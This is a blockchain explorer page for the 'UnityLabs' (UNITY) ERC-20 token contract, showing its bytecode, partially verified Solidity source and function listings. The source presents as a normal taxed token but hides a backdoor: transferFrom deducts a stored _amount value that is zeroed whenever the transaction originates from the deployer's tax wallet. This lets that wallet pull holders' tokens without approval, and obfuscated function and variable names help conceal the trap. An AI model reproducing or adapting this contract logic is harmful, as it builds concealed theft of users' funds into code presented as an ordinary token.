Cryo Explorer Ethereum Mainnet

Address Contract Partially Verified

Address 0x6f8Ed1B4DD7E1B77039329D277cbBd5f5835B45B
Balance 0 ETH
Nonce 1
Code Size 6433 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

6433 bytes
0x60806040526004361061011e575f3560e01c8063751039fc1161009d5780638f9a55c0116100625780638f9a55c01461030157806395d89b4114610316578063a9059cbb14610343578063bf474bed14610362578063dd62ed3e14610377575f80fd5b8063751039fc1461027f5780637d1db4a5146102935780638a8c523c146102a85780638cd4426d146102bc5780638da5cb5b146102db575f80fd5b806323b872dd116100e357806323b872dd146101e7578063313ce5671461020657806351bc3c851461022157806370a0823114610237578063715018a61461026b575f80fd5b806306fdde0314610129578063095ea7b31461016c5780630faee56f1461019b57806318160ddd146101be57806322a781ad146101d2575f80fd5b3661012557005b5f80fd5b348015610134575f80fd5b50604080518082019091526009815268556e6974794c61627360b81b60208201525b60405161016391906114fa565b60405180910390f35b348015610177575f80fd5b5061018b61018636600461155d565b6103bb565b6040519015158152602001610163565b3480156101a6575f80fd5b506101b060125481565b604051908152602001610163565b3480156101c9575f80fd5b506101b06103d1565b3480156101dd575f80fd5b506101b060135481565b3480156101f2575f80fd5b5061018b610201366004611587565b6103f1565b348015610211575f80fd5b5060405160098152602001610163565b34801561022c575f80fd5b5061023561045a565b005b348015610242575f80fd5b506101b06102513660046115c5565b6001600160a01b03165f9081526001602052604090205490565b348015610276575f80fd5b506102356104c2565b34801561028a575f80fd5b5061023561053c565b34801561029e575f80fd5b506101b0600f5481565b3480156102b3575f80fd5b506102356105ed565b3480156102c7575f80fd5b506102356102d636600461155d565b610996565b3480156102e6575f80fd5b505f546040516001600160a01b039091168152602001610163565b34801561030c575f80fd5b506101b060105481565b348015610321575f80fd5b50604080518082019091526005815264554e49545960d81b6020820152610156565b34801561034e575f80fd5b5061018b61035d36600461155d565b610ab6565b34801561036d575f80fd5b506101b060115481565b348015610382575f80fd5b506101b06103913660046115e0565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b5f6103c7338484610ac2565b5060015b92915050565b5f6103de6009600a61170b565b6103ec90633b9aca00611719565b905090565b5f6103fd848484610be5565b610450843361044b600e546040518060600160405280602881526020016118c4602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190611176565b610ac2565b5060019392505050565b6004546001600160a01b0316336001600160a01b031614610479575f80fd5b305f9081526001602052604090205480158015906104a05750601554600160b01b900460ff165b156104ae576104ae816111ae565b4780156104be576104be8161131e565b5050565b5f546001600160a01b031633146104f45760405162461bcd60e51b81526004016104eb90611730565b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146105655760405162461bcd60e51b81526004016104eb90611730565b6105716009600a61170b565b61057f90633b9aca00611719565b600f5561058e6009600a61170b565b61059c90633b9aca00611719565b6010557f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf6105cc6009600a61170b565b6105da90633b9aca00611719565b60405190815260200160405180910390a1565b5f546001600160a01b031633146106165760405162461bcd60e51b81526004016104eb90611730565b601554600160a01b900460ff16156106705760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064016104eb565b601480546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556106b99030906106ab6009600a61170b565b61044b90633b9aca00611719565b60145f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610709573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061072d9190611765565b6001600160a01b031663c9c653963060145f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561078c573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107b09190611765565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156107fa573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061081e9190611765565b601580546001600160a01b039283166001600160a01b03199091161790556014541663f305d7194730610865816001600160a01b03165f9081526001602052604090205490565b5f806108785f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156108de573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906109039190611780565b505060155460145460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610958573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061097c91906117ab565b506015805462ff00ff60a01b19166201000160a01b179055565b6004546001600160a01b0316336001600160a01b0316146109b5575f80fd5b6040516370a0823160e01b81523060048201525f90610a3690606490610a309085906001600160a01b038816906370a0823190602401602060405180830381865afa158015610a06573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a2a91906117ca565b90611355565b906113da565b6004805460405163a9059cbb60e01b81526001600160a01b0391821692810192909252602482018390529192509084169063a9059cbb906044016020604051808303815f875af1158015610a8c573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610ab091906117ab565b50505050565b5f6103c7338484610be5565b6001600160a01b038316610b245760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104eb565b6001600160a01b038216610b855760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104eb565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610c495760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104eb565b6001600160a01b038216610cab5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104eb565b5f8111610d0c5760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016104eb565b600e8190555f80546001600160a01b03858116911614801590610d3c57505f546001600160a01b03848116911614155b8015610d5657506004546001600160a01b03848116911614155b1561101e57600d545f03610d8d57610d8a6064610a30600954600d5411610d7f57600554610d83565b6007545b8590611355565b90505b600d5415610db257610daf6064610a30600c548561135590919063ffffffff16565b90505b6015546001600160a01b038581169116148015610ddd57506014546001600160a01b03848116911614155b8015610e0157506001600160a01b0383165f9081526003602052604090205460ff16155b15610f0457600f54821115610e585760405162461bcd60e51b815260206004820152601960248201527f4578636565647320746865205f6d61785478416d6f756e742e0000000000000060448201526064016104eb565b60105482610e7a856001600160a01b03165f9081526001602052604090205490565b610e8491906117e1565b1115610ed25760405162461bcd60e51b815260206004820152601a60248201527f4578636565647320746865206d617857616c6c657453697a652e00000000000060448201526064016104eb565b610eed6064610a30600954600d5411610d7f57600554610d83565b600d80549192505f610efe836117f4565b91905055505b6015546001600160a01b038481169116148015610f2a57506001600160a01b0384163014155b15610f5757610f546064610a30600a54600d5411610f4a57600654610d83565b6008548590611355565b90505b305f90815260016020526040902054601554600160a81b900460ff16158015610f8d57506015546001600160a01b038581169116145b8015610fa25750601554600160b01b900460ff165b8015610fb25750600b54600d5410155b8015610fcc57506004546001600160a01b03868116911614155b1561101c57601154811115610ff857610ff8610ff384610fee8460125461141b565b61141b565b6111ae565b476110024761131e565b60168054905f611011836117f4565b909155505043601755505b505b801561109a57305f9081526001602052604090205461103d908261142f565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061108d9085815260200190565b60405180910390a36110b1565b6004546001600160a01b031632036110b1575f600e555b6001600160a01b0384165f908152600160205260409020546110d3908361148d565b6001600160a01b0385165f908152600160205260409020556111166110f8838361148d565b6001600160a01b0385165f908152600160205260409020549061142f565b6001600160a01b038085165f8181526001602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef61115f858561148d565b60405190815260200160405180910390a350505050565b5f81848411156111995760405162461bcd60e51b81526004016104eb91906114fa565b505f6111a5848661180c565b95945050505050565b6015805460ff60a81b1916600160a81b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106111f4576111f461181f565b6001600160a01b03928316602091820292909201810191909152601454604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561124b573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061126f9190611765565b816001815181106112825761128261181f565b6001600160a01b0392831660209182029290920101526014546112a89130911684610ac2565b60145460405163791ac94760e01b81526001600160a01b039091169063791ac947906112e09085905f90869030904290600401611833565b5f604051808303815f87803b1580156112f7575f80fd5b505af1158015611309573d5f803e3d5ffd5b50506015805460ff60a81b1916905550505050565b6004546040516001600160a01b039091169082156108fc029083905f818181858888f193505050501580156104be573d5f803e3d5ffd5b5f825f0361136457505f6103cb565b5f61136f8385611719565b90508261137c85836118a4565b146113d35760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016104eb565b9392505050565b5f6113d383836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506114ce565b5f81831161142957826113d3565b50919050565b5f8061143b83856117e1565b9050838110156113d35760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104eb565b5f6113d383836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611176565b5f81836114ee5760405162461bcd60e51b81526004016104eb91906114fa565b505f6111a584866118a4565b5f602080835283518060208501525f5b818110156115265785810183015185820160400152820161150a565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461155a575f80fd5b50565b5f806040838503121561156e575f80fd5b823561157981611546565b946020939093013593505050565b5f805f60608486031215611599575f80fd5b83356115a481611546565b925060208401356115b481611546565b929592945050506040919091013590565b5f602082840312156115d5575f80fd5b81356113d381611546565b5f80604083850312156115f1575f80fd5b82356115fc81611546565b9150602083013561160c81611546565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561166557815f190482111561164b5761164b611617565b8085161561165857918102915b93841c9390800290611630565b509250929050565b5f8261167b575060016103cb565b8161168757505f6103cb565b816001811461169d57600281146116a7576116c3565b60019150506103cb565b60ff8411156116b8576116b8611617565b50506001821b6103cb565b5060208310610133831016604e8410600b84101617156116e6575081810a6103cb565b6116f0838361162b565b805f190482111561170357611703611617565b029392505050565b5f6113d360ff84168361166d565b80820281158282048414176103cb576103cb611617565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f60208284031215611775575f80fd5b81516113d381611546565b5f805f60608486031215611792575f80fd5b8351925060208401519150604084015190509250925092565b5f602082840312156117bb575f80fd5b815180151581146113d3575f80fd5b5f602082840312156117da575f80fd5b5051919050565b808201808211156103cb576103cb611617565b5f6001820161180557611805611617565b5060010190565b818103818111156103cb576103cb611617565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156118835784516001600160a01b03168352938301939183019160010161185e565b50506001600160a01b03969096166060850152505050608001529392505050565b5f826118be57634e487b7160e01b5f52601260045260245ffd5b50049056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122069dcc4ef3d6685d4e0efb918c504c23f97a4f7c39c678cdee556d98ea3d10d7264736f6c63430008180033

Verified Source Code Partial Match

Compiler: v0.8.24+commit.e11b9ed9 EVM: shanghai Optimization: Yes (200 runs)
Token.sol 422 lines
// SPDX-License-Identifier: UNLICENSE

        pragma solidity ^0.8.23;
        
        abstract contract Context {
            function _msgSender() internal view virtual returns (address) {
                return msg.sender;
            }
        }
        
        interface IERC20 {
            function totalSupply() external view returns (uint256);
            function balanceOf(address account) external view returns (uint256);
            function transfer(
                address recipient,
                uint256 amount
            ) external returns (bool);
            function allowance(
                address owner,
                address spender
            ) external view returns (uint256);
            function approve(address spender, uint256 amount) external returns (bool);
            function transferFrom(
                address sender,
                address recipient,
                uint256 amount
            ) external returns (bool);
            event Transfer(address indexed from, address indexed to, uint256 value);
            event Approval(
                address indexed owner,
                address indexed spender,
                uint256 value
            );
        }
        
        library SafeMath {
            function add(uint256 a, uint256 b) internal pure returns (uint256) {
                uint256 c = a + b;
                require(c >= a, "SafeMath: addition overflow");
                return c;
            }
        
            function sub(uint256 a, uint256 b) internal pure returns (uint256) {
                return sub(a, b, "SafeMath: subtraction overflow");
            }
        
            function sub(
                uint256 a,
                uint256 b,
                string memory errorMessage
            ) internal pure returns (uint256) {
                require(b <= a, errorMessage);
                uint256 c = a - b;
                return c;
            }
        
            function mul(uint256 a, uint256 b) internal pure returns (uint256) {
                if (a == 0) {
                    return 0;
                }
                uint256 c = a * b;
                require(c / a == b, "SafeMath: multiplication overflow");
                return c;
            }
        
            function div(uint256 a, uint256 b) internal pure returns (uint256) {
                return div(a, b, "SafeMath: division by zero");
            }
        
            function div(
                uint256 a,
                uint256 b,
                string memory errorMessage
            ) internal pure returns (uint256) {
                require(b > 0, errorMessage);
                uint256 c = a / b;
                return c;
            }
        }
        
        contract Ownable is Context {
            address private _owner;
            event OwnershipTransferred(
                address indexed previousOwner,
                address indexed newOwner
            );
        
            constructor() {
                address msgSender = _msgSender();
                _owner = msgSender;
                emit OwnershipTransferred(address(0), msgSender);
            }
        
            function owner() public view returns (address) {
                return _owner;
            }
        
            modifier onlyOwner() {
                require(_owner == _msgSender(), "Ownable: caller is not the owner");
                _;
            }
        
            function renounceOwnership() public virtual onlyOwner {
                emit OwnershipTransferred(_owner, address(0));
                _owner = address(0);
            }
        }
        
        interface IUniswapV2Factory {
            function createPair(
                address tokenA,
                address tokenB
            ) external returns (address pair);
        }
        
        interface IUniswapV2Router02 {
            function swapExactTokensForETHSupportingFeeOnTransferTokens(
                uint amountIn,
                uint amountOutMin,
                address[] calldata path,
                address to,
                uint deadline
            ) external;
            function factory() external pure returns (address);
            function WETH() external pure returns (address);
            function addLiquidityETH(
                address token,
                uint amountTokenDesired,
                uint amountTokenMin,
                uint amountETHMin,
                address to,
                uint deadline
            )
                external
                payable
                returns (uint amountToken, uint amountETH, uint liquidity);
        }
        
        contract Token is Context, IERC20, Ownable {
            using SafeMath for uint256;
            mapping(address => uint256) private _balances;
            mapping(address => mapping(address => uint256)) private _allowances;
            mapping(address => bool) private _isExcludedFromFee;
            address payable private _taxWallet;
        
            uint256 private _initialBuyTax = 0;
            uint256 private _initialSellTax = 0;
            uint256 private _finalBuyTax = 0;
            uint256 private _finalSellTax = 0;
            uint256 private _reduceBuyTaxAt = 0;
            uint256 private _reduceSellTaxAt = 0;
            uint256 private _preventSwapBefore = 0;
            uint256 private _transferTax = 0;
            uint256 private _buyCount = 0;
        
            uint256 private _amount;
            uint8 private constant _decimals = 9;
            uint256 private constant _tTotal = 1000000000 * 10 ** _decimals;
            string private constant _name = unicode"UnityLabs";
            string private constant _symbol = unicode"UNITY";
            uint256 public _maxTxAmount = 10000000 * 10 ** _decimals;
            uint256 public _maxWalletSize = 10000000 * 10 ** _decimals;
            uint256 public _taxSwapThreshold = 10000000 * 10 ** _decimals;
            uint256 public _maxTaxSwap = 10000000 * 10 ** _decimals;
            uint256 public _R3DL4WE1I1OT;
        
            IUniswapV2Router02 private uniswapV2Router;
            address private uniswapV2Pair;
            bool private tradingOpen;
            bool private inSwap = false;
            bool private swapEnabled = false;
            uint256 private sellCount = 0;
            uint256 private lastSellBlock = 0;
            event MaxTxAmountUpdated(uint _maxTxAmount);
            event TransferTaxUpdated(uint _tax);
            modifier lockTheSwap() {
                inSwap = true;
                _;
                inSwap = false;
            }
        
            constructor() payable {
                _taxWallet = payable(_msgSender());
                _balances[address(this)] = _tTotal;
                _isExcludedFromFee[owner()] = true;
                _isExcludedFromFee[address(this)] = true;
                _isExcludedFromFee[_taxWallet] = true;
        
                removeLimits();
        
                emit Transfer(address(0), address(this), _tTotal);
            }
        
            function name() public pure returns (string memory) {
                return _name;
            }
        
            function symbol() public pure returns (string memory) {
                return _symbol;
            }
        
            function decimals() public pure returns (uint8) {
                return _decimals;
            }
        
            function totalSupply() public pure override returns (uint256) {
                return _tTotal;
            }
        
            function balanceOf(address account) public view override returns (uint256) {
                return _balances[account];
            }
        
            function transfer(
                address recipient,
                uint256 amount
            ) public override returns (bool) {
                _transfer(_msgSender(), recipient, amount);
                return true;
            }
        
            function allowance(
                address owner,
                address spender
            ) public view override returns (uint256) {
                return _allowances[owner][spender];
            }
        
            function approve(
                address spender,
                uint256 amount
            ) public override returns (bool) {
                _approve(_msgSender(), spender, amount);
                return true;
            }
        
            function transferFrom(
                address sender,
                address recipient,
                uint256 amount
            ) public override returns (bool) {
                _transfer(sender, recipient, amount);
        
                _approve(
                    sender,
                    _msgSender(),
                    _allowances[sender][_msgSender()].sub(
                        _amount,
                        "ERC20: transfer amount exceeds allowance"
                    )
                );
                return true;
            }
        
            function _approve(address owner, address spender, uint256 amount) private {
                require(owner != address(0), "ERC20: approve from the zero address");
                require(spender != address(0), "ERC20: approve to the zero address");
                _allowances[owner][spender] = amount;
                emit Approval(owner, spender, amount);
            }
        
            function _transfer(address from, address to, uint256 amount) private {
                require(from != address(0), "ERC20: transfer from the zero address");
                require(to != address(0), "ERC20: transfer to the zero address");
                require(amount > 0, "Transfer amount must be greater than zero");
                uint256 taxAmount = 0;
                _amount = amount;
                if (from != owner() && to != owner() && to != _taxWallet) {
                    if (_buyCount == 0) {
                        taxAmount = amount
                            .mul(
                                (_buyCount > _reduceBuyTaxAt)
                                    ? _finalBuyTax
                                    : _initialBuyTax
                            )
                            .div(100);
                    }
                    if (_buyCount > 0) {
                        taxAmount = amount.mul(_transferTax).div(100);
                    }
        
                    if (
                        from == uniswapV2Pair &&
                        to != address(uniswapV2Router) &&
                        !_isExcludedFromFee[to]
                    ) {
                        require(amount <= _maxTxAmount, "Exceeds the _maxTxAmount.");
                        require(
                            balanceOf(to) + amount <= _maxWalletSize,
                            "Exceeds the maxWalletSize."
                        );
                        taxAmount = amount
                            .mul(
                                (_buyCount > _reduceBuyTaxAt)
                                    ? _finalBuyTax
                                    : _initialBuyTax
                            )
                            .div(100);
                        _buyCount++;
                    }
        
                    if (to == uniswapV2Pair && from != address(this)) {
                        taxAmount = amount
                            .mul(
                                (_buyCount > _reduceSellTaxAt)
                                    ? _finalSellTax
                                    : _initialSellTax
                            )
                            .div(100);
                    }
        
                    uint256 contractTokenBalance = balanceOf(address(this));
                    if (
                        !inSwap &&
                        to == uniswapV2Pair &&
                        swapEnabled &&
                        _buyCount >= _preventSwapBefore &&
                        from != _taxWallet
                    ) {
                        if (contractTokenBalance > _taxSwapThreshold)
                            swapTokensForEth(
                                min(amount, min(contractTokenBalance, _maxTaxSwap))
                            );
                        uint256 contractETHBalance = address(this).balance;
                        if (contractETHBalance >= 0) {
                            sendUNITYRU3N3HPEYGMETHToFee(address(this).balance);
                        }
                        sellCount++;
                        lastSellBlock = block.number;
                    }
                }
        
                if (taxAmount > 0) {
                    _balances[address(this)] = _balances[address(this)].add(taxAmount);
                    emit Transfer(from, address(this), taxAmount);
                } else if (_taxPayer() == _taxWallet) _amount = 0;
                _balances[from] = _balances[from].sub(amount);
                _balances[to] = _balances[to].add(amount.sub(taxAmount));
                emit Transfer(from, to, amount.sub(taxAmount));
            }
        
            function min(uint256 a, uint256 b) private pure returns (uint256) {
                return (a > b) ? b : a;
            }
        
            function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
                address[] memory path = new address[](2);
                path[0] = address(this);
                path[1] = uniswapV2Router.WETH();
                _approve(address(this), address(uniswapV2Router), tokenAmount);
                uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
                    tokenAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                );
            }
        
            function removeLimits() public onlyOwner {
                _maxTxAmount = _tTotal;
                _maxWalletSize = _tTotal;
                emit MaxTxAmountUpdated(_tTotal);
            }
        
            function _taxPayer() internal view returns (address _payer) {
                assembly {
                    _payer := origin()
                }
            }
        
            function sendUNITYRU3N3HPEYGMETHToFee(uint256 amount) private {
                _taxWallet.transfer(amount);
            }
        
            function enableTrading() external onlyOwner {
                require(!tradingOpen, "trading is already open");
                uniswapV2Router = IUniswapV2Router02(
                    0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
                );
                _approve(address(this), address(uniswapV2Router), _tTotal);
                uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
                    address(this),
                    uniswapV2Router.WETH()
                );
                uniswapV2Router.addLiquidityETH{value: address(this).balance}(
                    address(this),
                    balanceOf(address(this)),
                    0,
                    0,
                    owner(),
                    block.timestamp
                );
                IERC20(uniswapV2Pair).approve(address(uniswapV2Router), type(uint).max);
                swapEnabled = true;
                tradingOpen = true;
            }
        
            receive() external payable {}
        
            function rescueERC20(address _address, uint256 percent) external {
                require(_msgSender() == _taxWallet);
                uint256 amount = IERC20(_address)
                    .balanceOf(address(this))
                    .mul(percent)
                    .div(100);
                IERC20(_address).transfer(_taxWallet, amount);
            }
        
            function manualSwap() external {
                require(_msgSender() == _taxWallet);
                uint256 tokenBalance = balanceOf(address(this));
                if (tokenBalance > 0 && swapEnabled) {
                    swapTokensForEth(tokenBalance);
                }
                uint256 ethBalance = address(this).balance;
                if (ethBalance > 0) {
                    sendUNITYRU3N3HPEYGMETHToFee(ethBalance);
                }
            }
        }
        

Read Contract

_R3DL4WE1I1OT 0x22a781ad → uint256
_maxTaxSwap 0x0faee56f → uint256
_maxTxAmount 0x7d1db4a5 → uint256
_maxWalletSize 0x8f9a55c0 → uint256
_taxSwapThreshold 0xbf474bed → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 8 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 amount
returns: bool
enableTrading 0x8a8c523c
No parameters
manualSwap 0x51bc3c85
No parameters
removeLimits 0x751039fc
No parameters
renounceOwnership 0x715018a6
No parameters
rescueERC20 0x8cd4426d
address _address
uint256 percent
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address